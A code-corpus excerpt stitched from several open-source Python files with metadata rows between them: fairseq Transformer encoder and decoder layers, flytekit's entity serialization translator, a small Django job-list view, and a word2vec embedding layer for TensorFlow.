# for backwards compatibility with models that use args.relu_dropout
activation_dropout_p = getattr(args, "relu_dropout", 0) or 0
self.activation_dropout_module = FairseqDropout(
float(activation_dropout_p), module_name=self.__class__.__name__
)
self.normalize_before = args.encoder_normalize_before
self.fc1 = self.build_fc1(
self.embed_dim,
args.encoder_ffn_embed_dim,
self.quant_noise,
self.quant_noise_block_size,
)
self.fc2 = self.build_fc2(
args.encoder_ffn_embed_dim,
self.embed_dim,
self.quant_noise,
self.quant_noise_block_size,
)
self.final_layer_norm = LayerNorm(self.embed_dim)
def build_fc1(self, input_dim, output_dim, q_noise, qn_block_size):
return quant_noise(
nn.Linear(input_dim, output_dim), p=q_noise, block_size=qn_block_size
)
def build_fc2(self, input_dim, output_dim, q_noise, qn_block_size):
return quant_noise(
nn.Linear(input_dim, output_dim), p=q_noise, block_size=qn_block_size
)
def build_self_attention(self, embed_dim, args):
return MultiheadAttention(
embed_dim,
args.encoder_attention_heads,
dropout=args.attention_dropout,
self_attention=True,
q_noise=self.quant_noise,
qn_block_size=self.quant_noise_block_size,
)
def residual_connection(self, x, residual):
return residual + x
def upgrade_state_dict_named(self, state_dict, name):
"""
Rename layer norm states from `...layer_norms.0.weight` to
`...self_attn_layer_norm.weight` and `...layer_norms.1.weight` to
`...final_layer_norm.weight`
"""
layer_norm_map = {"0": "self_attn_layer_norm", "1": "final_layer_norm"}
for old, new in layer_norm_map.items():
for m in ("weight", "bias"):
k = "{}.layer_norms.{}.{}".format(name, old, m)
if k in state_dict:
state_dict["{}.{}.{}".format(name, new, m)] = state_dict[k]
del state_dict[k]
def forward(self, x, encoder_padding_mask: Optional[Tensor], attn_mask: Optional[Tensor] = None):
"""
Args:
x (Tensor): input to the layer of shape `(seq_len, batch, embed_dim)`
encoder_padding_mask (ByteTensor): binary ByteTensor of shape
`(batch, seq_len)` where padding elements are indicated by ``1``.
attn_mask (ByteTensor): binary tensor of shape `(tgt_len, src_len)`,
where `tgt_len` is the length of output and `src_len` is the
length of input, though here both are equal to `seq_len`.
`attn_mask[tgt_i, src_j] = 1` means that when calculating the
embedding for `tgt_i`, we exclude (mask out) `src_j`. This is
useful for strided self-attention.
Returns:
encoded output of shape `(seq_len, batch, embed_dim)`
"""
# anything in original attn_mask = 1, becomes -1e8
# anything in original attn_mask = 0, becomes 0
# Note that we cannot use -inf here, because at some edge cases,
# the attention weight (before softmax) for some padded element in query
# will become -inf, which results in NaN in model parameters
if attn_mask is not None:
attn_mask = attn_mask.masked_fill(attn_mask.to(torch.bool), -1e8)
residual = x
if self.normalize_before:
x = self.self_attn_layer_norm(x)
x, _ = self.self_attn(
query=x,
key=x,
value=x,
key_padding_mask=encoder_padding_mask,
need_weights=False,
attn_mask=attn_mask,
)
x = self.dropout_module(x)
x = self.residual_connection(x, residual)
if not self.normalize_before:
x = self.self_attn_layer_norm(x)
residual = x
if self.normalize_before:
x = self.final_layer_norm(x)
x = self.activation_fn(self.fc1(x))
x = self.activation_dropout_module(x)
x = self.fc2(x)
x = self.dropout_module(x)
x = self.residual_connection(x, residual)
if not self.normalize_before:
x = self.final_layer_norm(x)
return x
class TransformerDecoderLayer(nn.Module):
"""Decoder layer block.
In the original paper each operation (multi-head attention, encoder
attention or FFN) is postprocessed with: `dropout -> add residual ->
layernorm`. In the tensor2tensor code they suggest that learning is more
robust when preprocessing each layer with layernorm and postprocessing with:
`dropout -> add residual`. We default to the approach in the paper, but the
tensor2tensor approach can be enabled by setting
*args.decoder_normalize_before* to ``True``.
Args:
args (argparse.Namespace): parsed command-line arguments
no_encoder_attn (bool, optional): whether to attend to encoder outputs
(default: False).
"""
def __init__(
self, args, no_encoder_attn=False, add_bias_kv=False, add_zero_attn=False
):
super().__init__()
self.embed_dim = args.decoder_embed_dim
self.dropout_module = FairseqDropout(
args.dropout, module_name=self.__class__.__name__
)
self.quant_noise = getattr(args, "quant_noise_pq", 0)
self.quant_noise_block_size = getattr(args, "quant_noise_pq_block_size", 8)
self.cross_self_attention = getattr(args, "cross_self_attention", False)
self.self_attn = self.build_self_attention(
self.embed_dim,
args,
add_bias_kv=add_bias_kv,
add_zero_attn=add_zero_attn,
)
self.activation_fn = utils.get_activation_fn(
activation=str(args.activation_fn)
if getattr(args, "activation_fn", None) is not None
else "relu"
)
activation_dropout_p = getattr(args, "activation_dropout", 0) or 0
if activation_dropout_p == 0:
# for backwards compatibility with models that use args.relu_dropout
activation_dropout_p = getattr(args, "relu_dropout", 0) or 0
self.activation_dropout_module = FairseqDropout(
float(activation_dropout_p), module_name=self.__class__.__name__
)
self.normalize_before = args.decoder_normalize_before
# use layerNorm rather than FusedLayerNorm for exporting.
# char_inputs can be used to determint this.
# TODO remove this once we update apex with the fix
export = getattr(args, "char_inputs", False)
self.self_attn_layer_norm = LayerNorm(self.embed_dim, export=export)
if no_encoder_attn:
self.encoder_attn = None
self.encoder_attn_layer_norm = None
else:
self.encoder_attn = self.build_encoder_attention(self.embed_dim, args)
self.encoder_attn_layer_norm = LayerNorm(self.embed_dim, export=export)
self.fc1 = self.build_fc1(
self.embed_dim,
args.decoder_ffn_embed_dim,
self.quant_noise,
self.quant_noise_block_size,
)
self.fc2 = self.build_fc2(
args.decoder_ffn_embed_dim,
self.embed_dim,
self.quant_noise,
self.quant_noise_block_size,
)
self.final_layer_norm = LayerNorm(self.embed_dim, export=export)
self.need_attn = True
self.onnx_trace = False
def build_fc1(self, input_dim, output_dim, q_noise, qn_block_size):
return quant_noise(nn.Linear(input_dim, output_dim), q_noise, qn_block_size)
def build_fc2(self, input_dim, output_dim, q_noise, qn_block_size):
return quant_noise(nn.Linear(input_dim, output_dim), q_noise, qn_block_size)
def build_self_attention(
self, embed_dim, args, add_bias_kv=False, add_zero_attn=False
):
return MultiheadAttention(
embed_dim,
args.decoder_attention_heads,
dropout=args.attention_dropout,
add_bias_kv=add_bias_kv,
add_zero_attn=add_zero_attn,
self_attention=not getattr(args, "cross_self_attention", False),
q_noise=self.quant_noise,
qn_block_size=self.quant_noise_block_size,
)
def build_encoder_attention(self, embed_dim, args):
return MultiheadAttention(
embed_dim,
args.decoder_attention_heads,
kdim=getattr(args, "encoder_embed_dim", None),
vdim=getattr(args, "encoder_embed_dim", None),
dropout=args.attention_dropout,
encoder_decoder_attention=True,
q_noise=self.quant_noise,
qn_block_size=self.quant_noise_block_size,
)
def prepare_for_onnx_export_(self):
self.onnx_trace = True
def residual_connection(self, x, residual):
return residual + x
def forward(
self,
x,
encoder_out: Optional[torch.Tensor] = None,
encoder_padding_mask: Optional[torch.Tensor] = None,
incremental_state: Optional[Dict[str, Dict[str, Optional[Tensor]]]] = None,
prev_self_attn_state: Optional[List[torch.Tensor]] = None,
prev_attn_state: Optional[List[torch.Tensor]] = None,
self_attn_mask: Optional[torch.Tensor] = None,
self_attn_padding_mask: Optional[torch.Tensor] = None,
need_attn: bool = False,
need_head_weights: bool = False,
):
"""
Args:
x (Tensor): input to the layer of shape `(seq_len, batch, embed_dim)`
encoder_padding_mask (ByteTensor, optional): binary
ByteTensor of shape `(batch, src_len)` where padding
elements are indicated by ``1``.
need_attn (bool, optional): return attention weights
need_head_weights (bool, optional): return attention weights
for each head (default: return average over heads).
Returns:
encoded output of shape `(seq_len, batch, embed_dim)`
"""
if need_head_weights:
need_attn = True
residual = x
if self.normalize_before:
x = self.self_attn_layer_norm(x)
if prev_self_attn_state is not None:
prev_key, prev_value = prev_self_attn_state[:2]
saved_state: Dict[str, Optional[Tensor]] = {
"prev_key": prev_key,
"prev_value": prev_value,
}
if len(prev_self_attn_state) >= 3:
saved_state["prev_key_padding_mask"] = prev_self_attn_state[2]
assert incremental_state is not None
self.self_attn._set_input_buffer(incremental_state, saved_state)
_self_attn_input_buffer = self.self_attn._get_input_buffer(incremental_state)
if self.cross_self_attention and not (
incremental_state is not None
and _self_attn_input_buffer is not None
and "prev_key" in _self_attn_input_buffer
):
if self_attn_mask is not None:
assert encoder_out is not None
self_attn_mask = torch.cat(
(x.new_zeros(x.size(0), encoder_out.size(0)), self_attn_mask), dim=1
)
if self_attn_padding_mask is not None:
if encoder_padding_mask is None:
assert encoder_out is not None
encoder_padding_mask = self_attn_padding_mask.new_zeros(
encoder_out.size(1), encoder_out.size(0)
)
self_attn_padding_mask = torch.cat(
(encoder_padding_mask, self_attn_padding_mask), dim=1
)
assert encoder_out is not None
y = torch.cat((encoder_out, x), dim=0)
else:
y = x
x, attn = self.self_attn(
query=x,
key=y,
value=y,
key_padding_mask=self_attn_padding_mask,
incremental_state=incremental_state,
need_weights=False,
attn_mask=self_attn_mask,
)
x = self.dropout_module(x)
x = self.residual_connection(x, residual)
if not self.normalize_before:
x = self.self_attn_layer_norm(x)
if self.encoder_attn is not None and encoder_out is not None:
residual = x
if self.normalize_before:
x = self.encoder_attn_layer_norm(x)
if prev_attn_state is not None:
prev_key, prev_value = prev_attn_state[:2]
saved_state: Dict[str, Optional[Tensor]] = {
"prev_key": prev_key,
"prev_value": prev_value,
}
if len(prev_attn_state) >= 3:
saved_state["prev_key_padding_mask"] = prev_attn_state[2]
assert incremental_state is not None
self.encoder_attn._set_input_buffer(incremental_state, saved_state)
x, attn = self.encoder_attn(
query=x,
key=encoder_out,
value=encoder_out,
key_padding_mask=encoder_padding_mask,
incremental_state=incremental_state,
static_kv=True,
need_weights=need_attn or (not self.training and self.need_attn),
need_head_weights=need_head_weights,
)
x = self.dropout_module(x)
x = self.residual_connection(x, residual)
if not self.normalize_before:
x = self.encoder_attn_layer_norm(x)
residual = x
if self.normalize_before:
x = self.final_layer_norm(x)
x = self.activation_fn(self.fc1(x))
x = self.activation_dropout_module(x)
x = self.fc2(x)
x = self.dropout_module(x)
x = self.residual_connection(x, residual)
if not self.normalize_before:
x = self.final_layer_norm(x)
if self.onnx_trace and incremental_state is not None:
saved_state = self.self_attn._get_input_buffer(incremental_state)
assert saved_state is not None
if self_attn_padding_mask is not None:
self_attn_state = [
saved_state["prev_key"],
saved_state["prev_value"],
saved_state["prev_key_padding_mask"],
]
else:
self_attn_state = [saved_state["prev_key"], saved_state["prev_value"]]
return x, attn, self_attn_state
return x, attn, None
def make_generation_fast_(self, need_attn: bool = False, **kwargs):
self.need_attn = need_attn
| 40.42446 | 101 | 0.622649 |
5d26fb6a59d1f8bc72de6daead3774133fa10e50 | 16,617 | py | Python | flytekit/common/translator.py | fediazgon/flytekit | 2c9fab495b7daf4504a927a4077b2e6799752a4e | [
"Apache-2.0"
] | null | null | null | flytekit/common/translator.py | fediazgon/flytekit | 2c9fab495b7daf4504a927a4077b2e6799752a4e | [
"Apache-2.0"
] | null | null | null | flytekit/common/translator.py | fediazgon/flytekit | 2c9fab495b7daf4504a927a4077b2e6799752a4e | [
"Apache-2.0"
] | null | null | null | from collections import OrderedDict
from typing import Callable, List, Optional, Union
from flytekit.common import constants as _common_constants
from flytekit.common.utils import _dnsify
from flytekit.core.base_task import PythonTask
from flytekit.core.condition import BranchNode
from flytekit.core.context_manager import SerializationSettings
from flytekit.core.launch_plan import LaunchPlan, ReferenceLaunchPlan
from flytekit.core.node import Node
from flytekit.core.python_auto_container import PythonAutoContainerTask
from flytekit.core.reference_entity import ReferenceEntity
from flytekit.core.task import ReferenceTask
from flytekit.core.workflow import ReferenceWorkflow, WorkflowBase
from flytekit.models import common as _common_models
from flytekit.models import interface as interface_models
from flytekit.models import launch_plan as _launch_plan_models
from flytekit.models import task as task_models
from flytekit.models.admin import workflow as admin_workflow_models
from flytekit.models.core import identifier as _identifier_model
from flytekit.models.core import workflow as _core_wf
from flytekit.models.core import workflow as workflow_model
from flytekit.models.core.workflow import BranchNode as BranchNodeModel
from flytekit.models.core.workflow import TaskNodeOverrides
FlyteLocalEntity = Union[
PythonTask,
BranchNode,
Node,
LaunchPlan,
WorkflowBase,
ReferenceWorkflow,
ReferenceTask,
ReferenceLaunchPlan,
ReferenceEntity,
]
FlyteControlPlaneEntity = Union[
task_models.TaskSpec,
_launch_plan_models.LaunchPlan,
admin_workflow_models.WorkflowSpec,
workflow_model.Node,
BranchNodeModel,
]
def to_serializable_case(
entity_mapping: OrderedDict, settings: SerializationSettings, c: _core_wf.IfBlock
) -> _core_wf.IfBlock:
if c is None:
raise ValueError("Cannot convert none cases to registrable")
then_node = get_serializable(entity_mapping, settings, c.then_node)
return _core_wf.IfBlock(condition=c.condition, then_node=then_node)
def to_serializable_cases(
entity_mapping: OrderedDict, settings: SerializationSettings, cases: List[_core_wf.IfBlock]
) -> Optional[List[_core_wf.IfBlock]]:
if cases is None:
return None
ret_cases = []
for c in cases:
ret_cases.append(to_serializable_case(entity_mapping, settings, c))
return ret_cases
def _fast_serialize_command_fn(
settings: SerializationSettings, task: PythonAutoContainerTask
) -> Callable[[SerializationSettings], List[str]]:
default_command = task.get_default_command(settings)
dest_dir = (
settings.fast_serialization_settings.destination_dir if settings.fast_serialization_settings is not None else ""
)
if dest_dir is None or dest_dir == "":
dest_dir = "{{ .dest_dir }}"
def fn(settings: SerializationSettings) -> List[str]:
return [
"pyflyte-fast-execute",
"--additional-distribution",
"{{ .remote_package_path }}",
"--dest-dir",
dest_dir,
"--",
*default_command,
]
return fn
def get_serializable_task(
entity_mapping: OrderedDict,
settings: SerializationSettings,
entity: FlyteLocalEntity,
) -> task_models.TaskSpec:
task_id = _identifier_model.Identifier(
_identifier_model.ResourceType.TASK,
settings.project,
settings.domain,
entity.name,
settings.version,
)
if settings.should_fast_serialize() and isinstance(entity, PythonAutoContainerTask):
# For fast registration, we'll need to muck with the command, but only for certain kinds of tasks. Specifically,
# tasks that rely on user code defined in the container. This should be encapsulated by the auto container
# parent class
entity.set_command_fn(_fast_serialize_command_fn(settings, entity))
tt = task_models.TaskTemplate(
id=task_id,
type=entity.task_type,
metadata=entity.metadata.to_taskmetadata_model(),
interface=entity.interface,
custom=entity.get_custom(settings),
container=entity.get_container(settings),
task_type_version=entity.task_type_version,
security_context=entity.security_context,
config=entity.get_config(settings),
k8s_pod=entity.get_k8s_pod(settings),
)
if settings.should_fast_serialize() and isinstance(entity, PythonAutoContainerTask):
entity.reset_command_fn()
return task_models.TaskSpec(template=tt)
def get_serializable_workflow(
entity_mapping: OrderedDict,
settings: SerializationSettings,
entity: WorkflowBase,
) -> admin_workflow_models.WorkflowSpec:
# Get node models
upstream_node_models = [
get_serializable(entity_mapping, settings, n)
for n in entity.nodes
if n.id != _common_constants.GLOBAL_INPUT_NODE_ID
]
sub_wfs = []
for n in entity.nodes:
if isinstance(n.flyte_entity, WorkflowBase):
if isinstance(n.flyte_entity, ReferenceEntity):
raise Exception(
f"Sorry, reference subworkflows do not work right now, please use the launch plan instead for the "
f"subworkflow you're trying to invoke. Node: {n}"
)
sub_wf_spec = get_serializable(entity_mapping, settings, n.flyte_entity)
if not isinstance(sub_wf_spec, admin_workflow_models.WorkflowSpec):
raise Exception(
f"Serialized form of a workflow should be an admin.WorkflowSpec but {type(sub_wf_spec)} found instead"
)
sub_wfs.append(sub_wf_spec.template)
sub_wfs.extend(sub_wf_spec.sub_workflows)
if isinstance(n.flyte_entity, BranchNode):
if_else: workflow_model.IfElseBlock = n.flyte_entity._ifelse_block
# See comment in get_serializable_branch_node also. Again this is a List[Node] even though it's supposed
# to be a List[workflow_model.Node]
leaf_nodes: List[Node] = filter( # noqa
None,
[
if_else.case.then_node,
*([] if if_else.other is None else [x.then_node for x in if_else.other]),
if_else.else_node,
],
)
for leaf_node in leaf_nodes:
if isinstance(leaf_node.flyte_entity, WorkflowBase):
sub_wf_spec = get_serializable(entity_mapping, settings, leaf_node.flyte_entity)
sub_wfs.append(sub_wf_spec.template)
sub_wfs.extend(sub_wf_spec.sub_workflows)
wf_id = _identifier_model.Identifier(
resource_type=_identifier_model.ResourceType.WORKFLOW,
project=settings.project,
domain=settings.domain,
name=entity.name,
version=settings.version,
)
wf_t = workflow_model.WorkflowTemplate(
id=wf_id,
metadata=entity.workflow_metadata.to_flyte_model(),
metadata_defaults=entity.workflow_metadata_defaults.to_flyte_model(),
interface=entity.interface,
nodes=upstream_node_models,
outputs=entity.output_bindings,
)
return admin_workflow_models.WorkflowSpec(template=wf_t, sub_workflows=list(set(sub_wfs)))
def get_serializable_launch_plan(
entity_mapping: OrderedDict,
settings: SerializationSettings,
entity: LaunchPlan,
) -> _launch_plan_models.LaunchPlan:
wf_spec = get_serializable(entity_mapping, settings, entity.workflow)
lps = _launch_plan_models.LaunchPlanSpec(
workflow_id=wf_spec.template.id,
entity_metadata=_launch_plan_models.LaunchPlanMetadata(
schedule=entity.schedule,
notifications=entity.notifications,
),
default_inputs=entity.parameters,
fixed_inputs=entity.fixed_inputs,
labels=entity.labels or _common_models.Labels({}),
annotations=entity.annotations or _common_models.Annotations({}),
auth_role=entity._auth_role or _common_models.AuthRole(),
raw_output_data_config=entity.raw_output_data_config or _common_models.RawOutputDataConfig(""),
max_parallelism=entity.max_parallelism,
)
lp_id = _identifier_model.Identifier(
resource_type=_identifier_model.ResourceType.LAUNCH_PLAN,
project=settings.project,
domain=settings.domain,
name=entity.name,
version=settings.version,
)
lp_model = _launch_plan_models.LaunchPlan(
id=lp_id,
spec=lps,
closure=_launch_plan_models.LaunchPlanClosure(
state=None,
expected_inputs=interface_models.ParameterMap({}),
expected_outputs=interface_models.VariableMap({}),
),
)
return lp_model
def get_serializable_node(
entity_mapping: OrderedDict,
settings: SerializationSettings,
entity: Node,
) -> workflow_model.Node:
if entity.flyte_entity is None:
raise Exception(f"Node {entity.id} has no flyte entity")
upstream_sdk_nodes = [
get_serializable(entity_mapping, settings, n)
for n in entity.upstream_nodes
if n.id != _common_constants.GLOBAL_INPUT_NODE_ID
]
# Reference entities also inherit from the classes in the second if statement so address them first.
if isinstance(entity.flyte_entity, ReferenceEntity):
# This is a throw away call.
# See the comment in compile_into_workflow in python_function_task. This is just used to place a None value
# in the entity_mapping.
get_serializable(entity_mapping, settings, entity.flyte_entity)
ref = entity.flyte_entity
node_model = workflow_model.Node(
id=_dnsify(entity.id),
metadata=entity.metadata,
inputs=entity.bindings,
upstream_node_ids=[n.id for n in upstream_sdk_nodes],
output_aliases=[],
)
if ref.reference.resource_type == _identifier_model.ResourceType.TASK:
node_model._task_node = workflow_model.TaskNode(reference_id=ref.id)
elif ref.reference.resource_type == _identifier_model.ResourceType.WORKFLOW:
node_model._workflow_node = workflow_model.WorkflowNode(sub_workflow_ref=ref.id)
elif ref.reference.resource_type == _identifier_model.ResourceType.LAUNCH_PLAN:
node_model._workflow_node = workflow_model.WorkflowNode(launchplan_ref=ref.id)
else:
raise Exception(f"Unexpected reference type {ref}")
return node_model
if isinstance(entity.flyte_entity, PythonTask):
task_spec = get_serializable(entity_mapping, settings, entity.flyte_entity)
node_model = workflow_model.Node(
id=_dnsify(entity.id),
metadata=entity.metadata,
inputs=entity.bindings,
upstream_node_ids=[n.id for n in upstream_sdk_nodes],
output_aliases=[],
task_node=workflow_model.TaskNode(
reference_id=task_spec.template.id, overrides=TaskNodeOverrides(resources=entity._resources)
),
)
if entity._aliases:
node_model._output_aliases = entity._aliases
elif isinstance(entity.flyte_entity, WorkflowBase):
wf_spec = get_serializable(entity_mapping, settings, entity.flyte_entity)
node_model = workflow_model.Node(
id=_dnsify(entity.id),
metadata=entity.metadata,
inputs=entity.bindings,
upstream_node_ids=[n.id for n in upstream_sdk_nodes],
output_aliases=[],
workflow_node=workflow_model.WorkflowNode(sub_workflow_ref=wf_spec.template.id),
)
elif isinstance(entity.flyte_entity, BranchNode):
node_model = workflow_model.Node(
id=_dnsify(entity.id),
metadata=entity.metadata,
inputs=entity.bindings,
upstream_node_ids=[n.id for n in upstream_sdk_nodes],
output_aliases=[],
branch_node=get_serializable(entity_mapping, settings, entity.flyte_entity),
)
elif isinstance(entity.flyte_entity, LaunchPlan):
lp_spec = get_serializable(entity_mapping, settings, entity.flyte_entity)
node_model = workflow_model.Node(
id=_dnsify(entity.id),
metadata=entity.metadata,
inputs=entity.bindings,
upstream_node_ids=[n.id for n in upstream_sdk_nodes],
output_aliases=[],
workflow_node=workflow_model.WorkflowNode(launchplan_ref=lp_spec.id),
)
else:
raise Exception(f"Node contained non-serializable entity {entity._flyte_entity}")
return node_model
def get_serializable_branch_node(
entity_mapping: OrderedDict,
settings: SerializationSettings,
entity: FlyteLocalEntity,
) -> BranchNodeModel:
# We have to iterate through the blocks to convert the nodes from the internal Node type to the Node model type.
# This was done to avoid having to create our own IfElseBlock object (i.e. condition.py just uses the model
# directly) even though the node there is of the wrong type (our type instead of the model type).
# TODO this should be cleaned up instead of mutation, we probaby should just create a new object
first = to_serializable_case(entity_mapping, settings, entity._ifelse_block.case)
other = to_serializable_cases(entity_mapping, settings, entity._ifelse_block.other)
else_node_model = None
if entity._ifelse_block.else_node:
else_node_model = get_serializable(entity_mapping, settings, entity._ifelse_block.else_node)
return BranchNodeModel(
if_else=_core_wf.IfElseBlock(
case=first, other=other, else_node=else_node_model, error=entity._ifelse_block.error
)
)
def get_serializable(
entity_mapping: OrderedDict,
settings: SerializationSettings,
entity: FlyteLocalEntity,
) -> FlyteControlPlaneEntity:
"""
The flytekit authoring code produces objects representing Flyte entities (tasks, workflows, etc.). In order to
register these, they need to be converted into objects that Flyte Admin understands (the IDL objects basically, but
this function currently translates to the layer above (e.g. SdkTask) - this will be changed to the IDL objects
directly in the future).
:param entity_mapping: This is an ordered dict that will be mutated in place. The reason this argument exists is
because there is a natural ordering to the entities at registration time. That is, underlying tasks have to be
registered before the workflows that use them. The recursive search done by this function and the functions
above form a natural topological sort, finding the dependent entities and adding them to this parameter before
the parent entity this function is called with.
:param settings: used to pick up project/domain/name - to be deprecated.
:param entity: The local flyte entity to try to convert (along with its dependencies)
:param fast: For tasks only, fast serialization produces a different command.
:return: The resulting control plane entity, in addition to being added to the mutable entity_mapping parameter
is also returned.
"""
if entity in entity_mapping:
return entity_mapping[entity]
if isinstance(entity, ReferenceEntity):
# TODO: Create a non-registerable model class comparable to TaskSpec or WorkflowSpec to replace None as a
# keystone value. The purpose is only to store something so that we can check for it when compiling
# dynamic tasks. See comment in compile_into_workflow.
cp_entity = None
elif isinstance(entity, PythonTask):
cp_entity = get_serializable_task(entity_mapping, settings, entity)
elif isinstance(entity, WorkflowBase):
cp_entity = get_serializable_workflow(entity_mapping, settings, entity)
elif isinstance(entity, Node):
cp_entity = get_serializable_node(entity_mapping, settings, entity)
elif isinstance(entity, LaunchPlan):
cp_entity = get_serializable_launch_plan(entity_mapping, settings, entity)
elif isinstance(entity, BranchNode):
cp_entity = get_serializable_branch_node(entity_mapping, settings, entity)
else:
raise Exception(f"Non serializable type found {type(entity)} Entity {entity}")
# This needs to be at the bottom not the top - i.e. dependent tasks get added before the workflow containing it
entity_mapping[entity] = cp_entity
return cp_entity
| 41.962121 | 122 | 0.70795 |
2f538a5280c56f599990fe1448e3f1c2433341c4 | 274 | py | Python | jobs/views.py | aiventimptner/farafmb | b9ac1439698dae83d70cbfdc1e1c03146a967699 | [
"MIT"
] | 1 | 2017-04-06T09:12:45.000Z | 2017-04-06T09:12:45.000Z | jobs/views.py | aiventimptner/farafmb | b9ac1439698dae83d70cbfdc1e1c03146a967699 | [
"MIT"
] | 2 | 2017-09-07T22:09:50.000Z | 2020-06-09T14:46:30.000Z | jobs/views.py | aiventimptner/farafmb | b9ac1439698dae83d70cbfdc1e1c03146a967699 | [
"MIT"
] | null | null | null | from django.shortcuts import render
from django.utils import timezone
from django.views import generic
from .models import Job
class JobList(generic.ListView):
model = Job
queryset = Job.objects.exclude(expired_on__lt=timezone.now())
ordering = '-created_on'
| 22.833333 | 65 | 0.766423 |
f5a6b93e88c5f69bb3c2ce5570e48a045ca0c456 | 8,305 | py | Python | elit/layers/embeddings/word2vec_tf.py | emorynlp/levi-graph-amr-parser | f71f1056c13181b8db31d6136451fb8d57114819 | [
"Apache-2.0"
] | 9 | 2021-07-12T22:05:47.000Z | 2022-02-22T03:10:14.000Z | elit/layers/embeddings/word2vec_tf.py | emorynlp/levi-graph-amr-parser | f71f1056c13181b8db31d6136451fb8d57114819 | [
"Apache-2.0"
] | 4 | 2021-08-31T08:28:37.000Z | 2022-03-28T05:52:14.000Z | elit/layers/embeddings/word2vec_tf.py | emorynlp/levi-graph-amr-parser | f71f1056c13181b8db31d6136451fb8d57114819 | [
"Apache-2.0"
] | null | null | null | # -*- coding:utf-8 -*-
# Author: hankcs
# Date: 2019-08-24 21:49
import os
from typing import Tuple, Union, List
import numpy as np
import tensorflow as tf
from tensorflow.python.ops import math_ops
from elit.common.vocab_tf import VocabTF
from elit.utils.io_util import load_word2vec, get_resource
from elit.utils.tf_util import hanlp_register
from elit.common.util import DummyContext
class Word2VecEmbeddingV1(tf.keras.layers.Layer):
def __init__(self, path: str = None, vocab: VocabTF = None, normalize: bool = False, load_all=True, mask_zero=True,
trainable=False, name=None, dtype=None, dynamic=False, **kwargs):
super().__init__(trainable, name, dtype, dynamic, **kwargs)
if load_all and vocab and vocab.locked:
vocab.unlock()
self.vocab, self.array_np = self._load(path, vocab, normalize)
self.vocab.lock()
self.array_ks = tf.keras.layers.Embedding(input_dim=len(self.vocab), output_dim=self.dim, trainable=trainable,
embeddings_initializer=tf.keras.initializers.Constant(self.array_np),
mask_zero=mask_zero)
self.mask_zero = mask_zero
self.supports_masking = mask_zero
def compute_mask(self, inputs, mask=None):
if not self.mask_zero:
return None
return math_ops.not_equal(inputs, self.vocab.pad_idx)
def call(self, inputs, **kwargs):
return self.array_ks(inputs, **kwargs)
def compute_output_shape(self, input_shape):
return input_shape[0], self.dim
@staticmethod
def _load(path, vocab, normalize=False) -> Tuple[VocabTF, Union[np.ndarray, None]]:
if not vocab:
vocab = VocabTF()
if not path:
return vocab, None
assert vocab.unk_idx is not None
word2vec, dim = load_word2vec(path)
for word in word2vec:
vocab.get_idx(word)
pret_embs = np.zeros(shape=(len(vocab), dim), dtype=np.float32)
state = np.random.get_state()
np.random.seed(0)
bias = np.random.uniform(low=-0.001, high=0.001, size=dim).astype(dtype=np.float32)
scale = np.sqrt(3.0 / dim)
for word, idx in vocab.token_to_idx.items():
vec = word2vec.get(word, None)
if vec is None:
vec = word2vec.get(word.lower(), None)
# if vec is not None:
# vec += bias
if vec is None:
# vec = np.random.uniform(-scale, scale, [dim])
vec = np.zeros([dim], dtype=np.float32)
pret_embs[idx] = vec
# noinspection PyTypeChecker
np.random.set_state(state)
return vocab, pret_embs
@property
def size(self):
if self.array_np is not None:
return self.array_np.shape[0]
@property
def dim(self):
if self.array_np is not None:
return self.array_np.shape[1]
@property
def shape(self):
if self.array_np is None:
return None
return self.array_np.shape
def get_vector(self, word: str) -> np.ndarray:
assert self.array_np is not None
return self.array_np[self.vocab.get_idx_without_add(word)]
def __getitem__(self, word: Union[str, List, tf.Tensor]) -> np.ndarray:
if isinstance(word, str):
return self.get_vector(word)
elif isinstance(word, list):
vectors = np.zeros(shape=(len(word), self.dim))
for idx, token in enumerate(word):
vectors[idx] = self.get_vector(token)
return vectors
elif isinstance(word, tf.Tensor):
if word.dtype == tf.string:
word_ids = self.vocab.token_to_idx_table.lookup(word)
return tf.nn.embedding_lookup(self.array_tf, word_ids)
elif word.dtype == tf.int32 or word.dtype == tf.int64:
return tf.nn.embedding_lookup(self.array_tf, word)
@hanlp_register
class Word2VecEmbeddingTF(tf.keras.layers.Embedding):
def __init__(self, filepath: str = None, vocab: VocabTF = None, expand_vocab=True, lowercase=True,
input_dim=None, output_dim=None, unk=None, normalize=False,
embeddings_initializer='VarianceScaling',
embeddings_regularizer=None,
activity_regularizer=None, embeddings_constraint=None, mask_zero=True, input_length=None,
name=None, cpu=True, **kwargs):
filepath = get_resource(filepath)
word2vec, _output_dim = load_word2vec(filepath)
if output_dim:
assert output_dim == _output_dim, f'output_dim = {output_dim} does not match {filepath}'
output_dim = _output_dim
# if the `unk` token exists in the pretrained,
# then replace it with a self-defined one, usually the one in word vocab
if unk and unk in word2vec:
word2vec[vocab.safe_unk_token] = word2vec.pop(unk)
if vocab is None:
vocab = VocabTF()
vocab.update(word2vec.keys())
if expand_vocab and vocab.mutable:
for word in word2vec:
vocab.get_idx(word.lower() if lowercase else word)
if input_dim:
assert input_dim == len(vocab), f'input_dim = {input_dim} does not match {filepath}'
input_dim = len(vocab)
# init matrix
self._embeddings_initializer = embeddings_initializer
embeddings_initializer = tf.keras.initializers.get(embeddings_initializer)
with tf.device('cpu:0') if cpu else DummyContext():
pret_embs = embeddings_initializer(shape=[input_dim, output_dim]).numpy()
# insert to pret_embs
for word, idx in vocab.token_to_idx.items():
vec = word2vec.get(word, None)
# Retry lower case
if vec is None and lowercase:
vec = word2vec.get(word.lower(), None)
if vec is not None:
pret_embs[idx] = vec
if normalize:
pret_embs /= np.std(pret_embs)
if not name:
name = os.path.splitext(os.path.basename(filepath))[0]
super().__init__(input_dim, output_dim, tf.keras.initializers.Constant(pret_embs), embeddings_regularizer,
activity_regularizer, embeddings_constraint, mask_zero, input_length, name=name, **kwargs)
self.filepath = filepath
self.expand_vocab = expand_vocab
self.lowercase = lowercase
def get_config(self):
config = {
'filepath': self.filepath,
'expand_vocab': self.expand_vocab,
'lowercase': self.lowercase,
}
base_config = super(Word2VecEmbeddingTF, self).get_config()
base_config['embeddings_initializer'] = self._embeddings_initializer
return dict(list(base_config.items()) + list(config.items()))
@hanlp_register
class StringWord2VecEmbeddingTF(Word2VecEmbeddingTF):
def __init__(self, filepath: str = None, vocab: VocabTF = None, expand_vocab=True, lowercase=False, input_dim=None,
output_dim=None, unk=None, normalize=False, embeddings_initializer='VarianceScaling',
embeddings_regularizer=None, activity_regularizer=None, embeddings_constraint=None, mask_zero=True,
input_length=None, name=None, **kwargs):
if vocab is None:
vocab = VocabTF()
self.vocab = vocab
